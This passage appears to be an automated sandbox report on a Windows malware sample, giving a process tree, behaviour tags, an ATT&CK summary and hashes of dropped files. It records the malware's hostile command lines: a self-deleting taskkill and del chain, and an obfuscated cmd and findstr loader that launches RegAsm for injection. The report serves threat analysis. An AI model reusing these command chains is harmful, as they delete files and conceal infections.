                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:1828
                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          PID:4724
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                          1⤵
                                                                                          • Enumerates connected drives
                                                                                          • Drops file in Program Files directory
                                                                                          • Drops file in Windows directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Modifies registry class
                                                                                          PID:5216
                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 2B7B52E853222356EE9ADBBEACD9F763 C
                                                                                            2⤵
                                                                                            • Loads dropped DLL
                                                                                            PID:5504
                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 598193E73C7554988CEC27878511CEB1
                                                                                            2⤵
                                                                                            • Blocklisted process makes network request
                                                                                            • Loads dropped DLL
                                                                                            PID:5884
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                              3⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:5804
                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding CB255015B06ED3D33C5BC795D74D22F2 E Global\MSI0000
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:5164
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5328
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:6096
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          PID:6032
                                                                                        • C:\Windows\system32\werfault.exe
                                                                                          werfault.exe /h /shared Global\111ad44877bf457cbdf48283a502bc7b /t 3188 /p 6096
                                                                                          1⤵
                                                                                            PID:5744
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                              PID:2792
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:5832
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:6052
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:5644
                                                                                            • C:\Users\Admin\AppData\Local\Temp\EC35.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\EC35.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:4072
                                                                                            • C:\Users\Admin\AppData\Local\Temp\F927.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\F927.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Modifies system certificate store
                                                                                              PID:6612
                                                                                            • C:\Users\Admin\AppData\Local\Temp\A7D.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\A7D.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:4216
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                2⤵
                                                                                                  PID:6524
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout 1
                                                                                                    3⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:2152
                                                                                                • C:\Users\Admin\AppData\Local\Temp\A7D.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\A7D.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Checks processor information in registry
                                                                                                  PID:5016
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im A7D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\A7D.exe" & del C:\ProgramData\*.dll & exit
                                                                                                    3⤵
                                                                                                      PID:4900
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /im A7D.exe /f
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:4196
                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                        timeout /t 6
                                                                                                        4⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:6284
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 1476
                                                                                                    2⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Program crash
                                                                                                    PID:6964
                                                                                                • C:\Users\Admin\AppData\Local\Temp\E38.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\E38.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:6528
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E38.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\E38.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:6648
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1184.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\1184.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:2188
                                                                                                • C:\Users\Admin\AppData\Local\Temp\16C5.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\16C5.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:6968
                                                                                                  • C:\Windows\SysWOW64\at.exe
                                                                                                    "C:\Windows\System32\at.exe"
                                                                                                    2⤵
                                                                                                      PID:6936
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c aOfiOrAQXMwQbejRxngsEXftIiahnVRVsrHIboQugmloFLOHTjdLTJSxnlnHKhswVymzxEzkHortNunX & C:\Windows\System32\cmd.exe < Viscere.xll
                                                                                                      2⤵
                                                                                                        PID:7056
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\System32\cmd.exe
                                                                                                          3⤵
                                                                                                            PID:5148
                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                              findstr /V /R "^btwCyeafUCTExwKGoPydOFoWmoEwfCqEVKpycYOURJeGZvjryQEabMASVyrWbsqaBgJKSEkpqlnyDCWrWBVnXIippdpdUSbAIKt$" Lunga.xll
                                                                                                              4⤵
                                                                                                                PID:6740
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Mutato.exe.com
                                                                                                                Mutato.exe.com f
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3480
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Mutato.exe.com
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Mutato.exe.com f
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops startup file
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:5940
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:6164
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5172
                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                ping 127.0.0.1 -n 30
                                                                                                                4⤵
                                                                                                                • Runs ping.exe
                                                                                                                PID:6248
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2702.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\2702.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:5060
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                            2⤵
                                                                                                              PID:3324
                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                timeout 1
                                                                                                                3⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:1040
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2702.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\2702.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5708
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 1492
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:6300
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:7096
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:6708
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:6808
                                                                                                                • C:\Windows\explorer.exe
                                                                                                                  C:\Windows\explorer.exe
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:5952
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                  1⤵
                                                                                                                    PID:5924
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe
                                                                                                                    1⤵
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:6100
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:4508
                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                      C:\Windows\explorer.exe
                                                                                                                      1⤵
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:6760
                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:5376

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                      Execution

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Persistence

                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                      1
                                                                                                                      T1060

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      BITS Jobs

                                                                                                                      1
                                                                                                                      T1197

                                                                                                                      Privilege Escalation

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Defense Evasion

                                                                                                                      Modify Registry

                                                                                                                      3
                                                                                                                      T1112

                                                                                                                      BITS Jobs

                                                                                                                      1
                                                                                                                      T1197

                                                                                                                      Install Root Certificate

                                                                                                                      1
                                                                                                                      T1130

                                                                                                                      Credential Access

                                                                                                                      Credentials in Files

                                                                                                                      5
                                                                                                                      T1081

                                                                                                                      Discovery

                                                                                                                      Software Discovery

                                                                                                                      1
                                                                                                                      T1518

                                                                                                                      Query Registry

                                                                                                                      5
                                                                                                                      T1012

                                                                                                                      System Information Discovery

                                                                                                                      6
                                                                                                                      T1082

                                                                                                                      Security Software Discovery

                                                                                                                      1
                                                                                                                      T1063

                                                                                                                      Peripheral Device Discovery

                                                                                                                      2
                                                                                                                      T1120

                                                                                                                      Remote System Discovery

                                                                                                                      1
                                                                                                                      T1018

                                                                                                                      Collection

                                                                                                                      Data from Local System

                                                                                                                      5
                                                                                                                      T1005

                                                                                                                      Command and Control

                                                                                                                      Web Service

                                                                                                                      1
                                                                                                                      T1102

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                        MD5

                                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                        SHA1

                                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                        SHA256

                                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                        SHA512

                                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                        MD5

                                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                        SHA1

                                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                        SHA256

                                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                        SHA512

                                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                      • C:\Program Files\Windows Defender\KYXGXFSJCE\ultramediaburner.exe
                                                                                                                        MD5

                                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                        SHA1

                                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                        SHA256

                                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                        SHA512

                                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                      • C:\Program Files\Windows Defender\KYXGXFSJCE\ultramediaburner.exe
                                                                                                                        MD5

                                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                        SHA1

                                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                        SHA256

                                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                        SHA512

                                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                      • C:\Program Files\install.dat
                                                                                                                        MD5

                                                                                                                        806c3221a013fec9530762750556c332

                                                                                                                        SHA1

                                                                                                                        36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                        SHA256

                                                                                                                        9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                        SHA512

                                                                                                                        56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                      • C:\Program Files\install.dll
                                                                                                                        MD5

                                                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                        SHA1

                                                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                        SHA256

                                                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                        SHA512

                                                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2i0r230s.kpq\001.exe
                                                                                                                        MD5

                                                                                                                        fa8dd39e54418c81ef4c7f624012557c

                                                                                                                        SHA1

                                                                                                                        c3cb938cc4086c36920a4cb3aea860aed3f7e9da

                                                                                                                        SHA256

                                                                                                                        0b045c0b6f8f3e975e9291655b3d46cc7c1d39ceb86a9add84d188c4139d51f7

                                                                                                                        SHA512

                                                                                                                        66d9291236ab6802ff5677711db130d2f09e0a76796c845527a8ad6dedcbf90c3c6200c8f05a4ae113b0bff597521fda571baafaa33a985c45190735baf11601

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2i0r230s.kpq\001.exe
                                                                                                                        MD5

                                                                                                                        fa8dd39e54418c81ef4c7f624012557c

                                                                                                                        SHA1

                                                                                                                        c3cb938cc4086c36920a4cb3aea860aed3f7e9da

                                                                                                                        SHA256

                                                                                                                        0b045c0b6f8f3e975e9291655b3d46cc7c1d39ceb86a9add84d188c4139d51f7

                                                                                                                        SHA512

                                                                                                                        66d9291236ab6802ff5677711db130d2f09e0a76796c845527a8ad6dedcbf90c3c6200c8f05a4ae113b0bff597521fda571baafaa33a985c45190735baf11601

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\44-67161-135-cc88c-0bb8fde52d3c0\Lidarisizhae.exe
                                                                                                                        MD5

                                                                                                                        c0cf9a2aa73be476329a8ffd03c17b19

                                                                                                                        SHA1

                                                                                                                        c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                                                        SHA256

                                                                                                                        f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                                                        SHA512

                                                                                                                        32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\44-67161-135-cc88c-0bb8fde52d3c0\Lidarisizhae.exe
                                                                                                                        MD5

                                                                                                                        c0cf9a2aa73be476329a8ffd03c17b19

                                                                                                                        SHA1

                                                                                                                        c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                                                        SHA256

                                                                                                                        f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                                                        SHA512

                                                                                                                        32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\44-67161-135-cc88c-0bb8fde52d3c0\Lidarisizhae.exe.config
                                                                                                                        MD5

                                                                                                                        98d2687aec923f98c37f7cda8de0eb19

                                                                                                                        SHA1

                                                                                                                        f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                        SHA256

                                                                                                                        8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                        SHA512

                                                                                                                        95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MSIF0E0.tmp
                                                                                                                        MD5

                                                                                                                        d07ddd437009ebb9c21882579bf2df0d

                                                                                                                        SHA1

                                                                                                                        a24a636db25ed29e5353fa5d274bf80c2ab8ad98

                                                                                                                        SHA256

                                                                                                                        c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

                                                                                                                        SHA512

                                                                                                                        8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MSIFA95.tmp
                                                                                                                        MD5

                                                                                                                        5a25fb13ed470b77eefd2eb89cb62c47

                                                                                                                        SHA1

                                                                                                                        3dbe567e3c8c8cd0f7e3c71a2536578ee11bf2a6

                                                                                                                        SHA256

                                                                                                                        0dca4854897ca77080c57936ad5c7c6c5f5c656a5785c09c7d2c1d196e4f3336

                                                                                                                        SHA512

                                                                                                                        2ec64666ad42e955e91378af855da59d3bcfb4cc3574bf023dda878c7d3e3dec442625de6e6b0434d1caf86a525395b04038cf7fdc6c292405d9f19c6f4e9952

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                        MD5

                                                                                                                        41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                        SHA1

                                                                                                                        0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                        SHA256

                                                                                                                        97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                        SHA512

                                                                                                                        5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                        MD5

                                                                                                                        41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                        SHA1

                                                                                                                        0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                        SHA256

                                                                                                                        97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                        SHA512

                                                                                                                        5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                        MD5

                                                                                                                        3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                        SHA1

                                                                                                                        55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                        SHA256

                                                                                                                        4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                        SHA512

                                                                                                                        f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                        MD5

                                                                                                                        3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                        SHA1

                                                                                                                        55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                        SHA256

                                                                                                                        4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                        SHA512

                                                                                                                        f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                        MD5

                                                                                                                        3bc84c0e8831842f2ae263789217245d

                                                                                                                        SHA1

                                                                                                                        d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                        SHA256

                                                                                                                        757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                        SHA512

                                                                                                                        f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                        MD5

                                                                                                                        3bc84c0e8831842f2ae263789217245d

                                                                                                                        SHA1

                                                                                                                        d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                        SHA256

                                                                                                                        757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                        SHA512

                                                                                                                        f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                        MD5

                                                                                                                        25d9f83dc738b4894cf159c6a9754e40

                                                                                                                        SHA1

                                                                                                                        152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                        SHA256

                                                                                                                        8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                        SHA512

                                                                                                                        41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                        MD5

                                                                                                                        25d9f83dc738b4894cf159c6a9754e40

                                                                                                                        SHA1

                                                                                                                        152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                                        SHA256

                                                                                                                        8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                                                                        SHA512

                                                                                                                        41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                        MD5

                                                                                                                        e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                        SHA1

                                                                                                                        1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                        SHA256

                                                                                                                        8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                        SHA512

                                                                                                                        71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                        MD5

                                                                                                                        e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                        SHA1

                                                                                                                        1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                        SHA256

                                                                                                                        8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                        SHA512

                                                                                                                        71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ce-c5014-5f2-69184-b02afe291bcd2\Kenessey.txt
                                                                                                                        MD5

                                                                                                                        97384261b8bbf966df16e5ad509922db

